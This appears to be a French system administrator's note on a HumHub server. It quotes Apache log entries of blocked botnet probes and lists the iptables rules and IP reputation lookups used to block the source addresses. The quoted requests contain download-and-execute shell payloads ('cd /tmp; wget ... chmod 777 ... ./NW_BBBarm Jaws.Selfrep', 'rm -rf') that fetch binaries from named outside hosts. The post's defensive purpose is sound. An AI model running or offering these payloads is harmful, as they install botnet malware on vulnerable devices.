J’ai pu voir dans les logs :
59.21.219.217 - - [01/Apr/2022:03:31:59 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-" 39.103.237.21 - - [01/Apr/2022:03:32:24 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-" 39.105.54.139 - - [01/Apr/2022:04:24:22 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/51.81.133.91/FKKK/NW_BBBarm;+chmod+777+NW_BBBarm;+./NW_BBBarm Jaws.Selfrep;rm+-rf+NW_BBBarm" 400 0 "-" "-" 222.85.179.149 - - [01/Apr/2022:09:06:42 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/51.81.133.91/FKKK/NW_BBBarm;+chmod+777+NW_BBBarm;+./NW_BBBarm Jaws.Selfrep;rm+-rf+NW_BBBarm" 400 0 "-" "-" 222.178.152.80 - - [01/Apr/2022:09:46:47 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-" 123.56.177.98 - - [01/Apr/2022:10:14:00 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-" 222.173.108.94 - - [01/Apr/2022:11:42:19 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
J’ai donc filtré les IP :
# iptables -A INPUT -s 59.21.219.217 -j DROP # iptables -A INPUT -s 39.103.237.21 -j DROP # iptables -A INPUT -s 39.105.54.139 -j DROP # iptables -A INPUT -s 222.85.179.149 -j DROP # iptables -A INPUT -s 222.178.152.80 -j DROP # iptables -A INPUT -s 123.56.177.98 -j DROP # iptables -A INPUT -s 222.173.108.94 -j DROP # iptables -A INPUT -s 51.81.133.91 -j DROP # /usr/sbin/iptables-save > /etc/iptables/rules.v4
L’ip : 51.81.133.91
| Localisation | R.A.S. chinoise de Hong Kong |
| Réputation | 100 % |
| Anonymat | Aucun détection |
| Usage | Attribué |
| Source | ARIN |
| Nom d’hote | ip91.ip-51-81-133.us |
J’ai pu voir aussi :
# grep " 400 " /var/log/apache2/access.humhub.log | grep shell | grep -v NW_BBBarm 39.103.239.37 - - [01/Apr/2022:00:34:45 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/146.0.75.242/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm" 400 0 "-" "-" 41.36.111.76 - - [01/Apr/2022:05:06:53 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws" 400 0 "-" "-" 47.100.208.164 - - [01/Apr/2022:06:24:45 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/146.0.75.242/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm" 400 0 "-" "-" 39.103.232.57 - - [01/Apr/2022:09:36:04 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/146.0.75.242/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm" 400 0 "-" "-"
J’ai donc filtré :
# iptables -A INPUT -s 39.103.239.37 -j DROP
# iptables -A INPUT -s 41.36.111.76 -j DROP
# iptables -A INPUT -s 47.100.208.164 -j DROP
# iptables -A INPUT -s 39.103.232.57 -j DROP
# iptables -A INPUT -s 146.0.75.242 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4
L’IP :146.0.75.242
| Localisation | Pays-Bas |
| Réputation | 86 % |
| Anonymat | Aucun détection |
| Usage | Attribué |
| Source | RIPE |
| Nom d’hote | 146.0.75.242 |